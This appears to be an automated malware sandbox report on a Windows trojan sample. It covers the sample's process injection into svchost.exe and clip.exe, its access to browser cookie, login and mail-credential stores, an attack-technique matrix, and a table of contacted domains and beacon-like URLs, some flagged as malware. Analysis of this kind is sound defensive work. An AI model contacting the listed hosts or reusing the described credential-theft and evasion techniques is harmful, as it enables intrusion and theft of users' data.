            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TOgpmvvWoj.exe"
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E74C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: TOgpmvvWoj.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: TOgpmvvWoj.exe, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762563946.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411852291.00000000018C1000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556342210.0000000001480000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762563946.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411852291.00000000018C1000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556342210.0000000001480000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762563946.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411852291.00000000018C1000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556342210.0000000001480000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762563946.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411852291.00000000018C1000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556342210.0000000001480000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E3886B cpuid
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E450D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E52230 GetUserNameW
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E4418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E14AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match | File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: TOgpmvvWoj.exe | Binary or memory string: WIN_81
            Source: TOgpmvvWoj.exe | Binary or memory string: WIN_XP
            Source: TOgpmvvWoj.exe | Binary or memory string: WIN_XPe
            Source: TOgpmvvWoj.exe | Binary or memory string: WIN_VISTA
            Source: TOgpmvvWoj.exe | Binary or memory string: WIN_7
            Source: TOgpmvvWoj.exe | Binary or memory string: WIN_8
            Source: TOgpmvvWoj.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            Source: Yara match | File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E86596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E86A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph ID: 1467718 | Sample: TOgpmvvWoj.exe | Start date: 04/07/2024 | Architecture: WINDOWS | Score: 100

            Analysis-level network: www.xn--matfrmn-jxa4m.se; www.xn--fhq1c541j0zr.com; 13 other IPs or domains
            Analysis-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures

            TOgpmvvWoj.exe (4) started
              Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
              -> svchost.exe started
                 Signatures: Maps a DLL or memory area into another process
                 -> ftlDDsmJxbqfWuvUNSEx.exe injected
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    -> clip.exe (13) started
                       Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                       -> ftlDDsmJxbqfWuvUNSEx.exe injected
                          Network: www.anuts.top 23.251.54.212, ports 49724, 49725, 49726, VPSQUANUS, United States; parkingpage.namecheap.com 91.195.240.19, ports 49736, 49737, 49738, SEDO-ASDE, Germany; 9 other IPs or domains
                          Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                       -> firefox.exe started

            Source | Detection | Scanner | Label
            TOgpmvvWoj.exe | 61% | ReversingLabs | Win32.Trojan.Nymeria
            TOgpmvvWoj.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            Source | Detection | Scanner | Label
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
            https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
            https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_auto | 0% | Avira URL Cloud | safe
            http://www.dmtxwuatbz.cc/lfkn/?YbCL=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT/Ba73/TyhXTi+N+fxoCuIe0q13OxeEQrax/xffncDH6aKqzo3DUBHR/D&fhW=BLvXr6e0EhyxeX | 0% | Avira URL Cloud | safe
            https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
            http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVz | 0% | Avira URL Cloud | safe
            http://www.telwisey.info/ei85/?YbCL=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXmSJOUDfP2hLYj3hfUWwVMjhSgAyvEJN1ww7Of4RepeBVRZKy4AbjBLzj&fhW=BLvXr6e0EhyxeX | 0% | Avira URL Cloud | safe
            https://reg.ru | 0% | Avira URL Cloud | safe
            http://www.bfiworkerscomp.com/xzzi/ | 0% | Avira URL Cloud | safe
            http://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEz | 0% | Avira URL Cloud | safe
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | 0% | Avira URL Cloud | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand= | 0% | Avira URL Cloud | safe
            http://www.domaintechnik.at/data/gfx/dt_logo_parking.png | 0% | Avira URL Cloud | safe
            https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_ | 0% | Avira URL Cloud | safe
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg | 0% | Avira URL Cloud | safe
            http://www.dmtxwuatbz.cc/lfkn/ | 0% | Avira URL Cloud | safe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | 0% | Avira URL Cloud | safe
            http://www.sandranoll.com/aroo/ | 100% | Avira URL Cloud | malware
            http://www.xn--matfrmn-jxa4m.se/4hda/ | 100% | Avira URL Cloud | malware
            http://i3.cdn-image.com/__media__/pics/29590/bg1.png) | 0% | Avira URL Cloud | safe
            http://www.gipsytroya.com/tf44/ | 0% | Avira URL Cloud | safe
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | 0% | Avira URL Cloud | safe
            https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png | 0% | Avira URL Cloud | safe
            http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2 | 0% | Avira URL Cloud | safe
            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/pics/28905/arrrow.png) | 0% | Avira URL Cloud | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
            https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan | 0% | Avira URL Cloud | safe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl- | 0% | Avira URL Cloud | safe
            http://www.sandranoll.com/aroo/?fhW=BLvXr6e0EhyxeX&YbCL=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG0QhvMR72FivEUbGSmkuxinEDBYWWrvqFUEDSzpZ60+MRxZstpJridvk | 100% | Avira URL Cloud | malware
            http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf | 0% | Avira URL Cloud | safe
            https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l | 0% | Avira URL Cloud | safe
            https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js | 0% | Avira URL Cloud | safe
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/contao.png | 0% | Avira URL Cloud | safe
            https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l | 0% | Avira URL Cloud | safe
            http://www.anuts.top/li0t/ | 0% | Avira URL Cloud | safe
            https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe
            https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&amp;YbCL=0lpTRQcDUH | 0% | Avira URL Cloud | safe
            http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2 | 0% | Avira URL Cloud | safe
            https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH | 0% | Avira URL Cloud | safe
            http://www.catherineviskadi.com/qe66/ | 0% | Avira URL Cloud | safe
            https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe
            https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb | 0% | Avira URL Cloud | safe
            http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/pics/28903/search.png) | 0% | Avira URL Cloud | safe
            https://cdn.consentmanager.net | 0% | Avira URL Cloud | safe
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking& | 0% | Avira URL Cloud | safe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css | 0% | Avira URL Cloud | safe
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png | 0% | Avira URL Cloud | safe
            https://static.loopia.se/responsive/images/iOS-72.png | 0% | Avira URL Cloud | safe
            http://www.helpers-lion.online/mooq/?fhW=BLvXr6e0EhyxeX&YbCL=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmvwMEDU2l3Vk/j3vF3XZl1x4VY01FUKFB6WA/ZrLtnyfA2FlJPqZ/llT | 0% | Avira URL Cloud | safe
            http://www.xn--fhq1c541j0zr.com/rm91/ | 0% | Avira URL Cloud | safe
            https://static.loopia.se/shared/logo/logo-loopia-white.svg | 0% | Avira URL Cloud | safe
            http://www.bfiworkerscomp.com/xzzi/?fhW=BLvXr6e0EhyxeX&YbCL=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T4RMdgNWnwSdCIYHgMQCJ4NovZBdigdGOlTiGNjGNRbnTmMSUCfOcFfR | 0% | Avira URL Cloud | safe
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | 0% | Avira URL Cloud | safe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | 0% | Avira URL Cloud | safe
            http://www.xn--fhq1c541j0zr.com/rm91/?fhW=BLvXr6e0EhyxeX&YbCL=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH8ALvnjmtlYhpciewdwpfxiI173pYZLp0P/Ncxt8Rkrw2XK7hs/fa/r1 | 0% | Avira URL Cloud | safe
            http://www.catherineviskadi.com/qe66/?YbCL=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+z+o+Zy5RZ1L4zwBfly91+2hSvhVojey3gmTZ6j57PRX7U3n66rWnGeG&fhW=BLvXr6e0EhyxeX | 0% | Avira URL Cloud | safe
            http://www.xn--matfrmn-jxa4m.se/4hda/?YbCL=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/f3zij1q4lqhkHJ2CNqkydCYpEmp0eXiAcXcwGmcRWkkIq9RVVQfBdjK&fhW=BLvXr6e0EhyxeX | 100% | Avira URL Cloud | malware
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix | 0% | Avira URL Cloud | safe
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
            http://www.telwisey.info/ei85/0%Avira URL Cloudsafe
            http://www.anuts.top/li0t/?fhW=BLvXr6e0EhyxeX&YbCL=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmjHLM7Y8ZEUPvisCvQ4bRBJc30+1Sfiya8KVn3bitTBOxY938FEQPd1w0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
            http://www.gipsytroya.com/tf44/?YbCL=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciyxdfJd/gaB8T0bTbhtXVrFmCpPW1iSF+B9h4XvImdTXjqQBmtK+ZYAHNG&fhW=BLvXr6e0EhyxeX0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
            http://www.Bfiworkerscomp.com0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%20%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
            https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
            https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2B0%Avira URL Cloudsafe
            http://www.helpers-lion.online/mooq/0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.sandranoll.com | 213.145.228.16 | true | true |  | unknown
www.dmtxwuatbz.cc | 172.67.210.102 | true | true |  | unknown
www.xn--matfrmn-jxa4m.se | 194.9.94.85 | true | true |  | unknown
www.catherineviskadi.com | 217.160.0.106 | true | true |  | unknown
www.anuts.top | 23.251.54.212 | true | true |  | unknown
www.helpers-lion.online | 194.58.112.174 | true | true |  | unknown
www.bfiworkerscomp.com | 208.91.197.27 | true | true |  | unknown
parkingpage.namecheap.com | 91.195.240.19 | true | true |  | unknown
www.telwisey.info | 199.192.19.19 | true | true |  | unknown
www.hprlz.cz | 5.44.111.162 | true | false |  | unknown
www.xn--fhq1c541j0zr.com | 43.252.167.188 | true | true |  | unknown
www.fourgrouw.cfd | unknown | unknown | true |  | unknown
www.hatercoin.online | unknown | unknown | true |  | unknown
www.tinmapco.com | unknown | unknown | true |  | unknown
www.gipsytroya.com | unknown | unknown | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.telwisey.info/ei85/?YbCL=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXmSJOUDfP2hLYj3hfUWwVMjhSgAyvEJN1ww7Of4RepeBVRZKy4AbjBLzj&fhW=BLvXr6e0EhyxeX | true | Avira URL Cloud: safe | unknown
http://www.dmtxwuatbz.cc/lfkn/?YbCL=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT/Ba73/TyhXTi+N+fxoCuIe0q13OxeEQrax/xffncDH6aKqzo3DUBHR/D&fhW=BLvXr6e0EhyxeX | true | Avira URL Cloud: safe | unknown
http://www.bfiworkerscomp.com/xzzi/ | true | Avira URL Cloud: safe | unknown
http://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEz | false | Avira URL Cloud: safe | unknown
http://www.dmtxwuatbz.cc/lfkn/ | true | Avira URL Cloud: safe | unknown
http://www.sandranoll.com/aroo/ | true | Avira URL Cloud: malware | unknown
http://www.gipsytroya.com/tf44/ | true | Avira URL Cloud: safe | unknown
http://www.xn--matfrmn-jxa4m.se/4hda/ | true | Avira URL Cloud: malware | unknown
http://www.sandranoll.com/aroo/?fhW=BLvXr6e0EhyxeX&YbCL=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG0QhvMR72FivEUbGSmkuxinEDBYWWrvqFUEDSzpZ60+MRxZstpJridvk | true | Avira URL Cloud: malware | unknown
http://www.catherineviskadi.com/qe66/ | true | Avira URL Cloud: safe | unknown
